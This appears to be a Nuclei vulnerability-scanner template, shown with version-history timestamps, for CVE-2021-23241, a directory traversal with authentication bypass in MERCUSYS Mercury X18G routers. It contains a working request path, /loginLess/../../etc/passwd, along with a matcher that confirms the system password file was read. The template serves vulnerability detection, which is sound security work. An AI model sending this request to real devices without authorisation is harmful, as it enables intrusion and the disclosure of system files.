my-nuclei-templates/CVE-2021-23241.yaml

35 lines
1.0 KiB
YAML
Raw Permalink Normal View History

2021-07-27 00:25:17 +00:00
id: CVE-2021-23241
info:
name: Mercury Router Web Server Directory Traversal
author: daffainfo
severity: medium
description: MERCUSYS Mercury X18G 1.0.5 devices allow Directory Traversal via ../ in conjunction with a loginLess or login.htm URI (for authentication bypass) to the web server, as demonstrated by the /loginLess/../../etc/passwd URI.
2021-09-02 08:03:02 +00:00
reference:
2021-07-27 00:25:17 +00:00
- https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md
- https://nvd.nist.gov/vuln/detail/CVE-2021-23241
2022-06-18 08:05:25 +00:00
- https://www.mercusys.com/en/
- https://www.mercurycom.com.cn/product-521-1.html
2021-09-17 06:03:58 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
2022-06-18 08:05:25 +00:00
cvss-score: 5.3
2021-09-17 06:03:58 +00:00
cve-id: CVE-2021-23241
cwe-id: CWE-22
2022-06-18 08:05:25 +00:00
tags: cve,cve2021,iot,lfi,router
2021-07-27 00:25:17 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/loginLess/../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
2022-06-18 08:05:25 +00:00
- "root:.*:0:0:"
2021-07-27 00:25:17 +00:00
part: body
- type: status
status:
- 200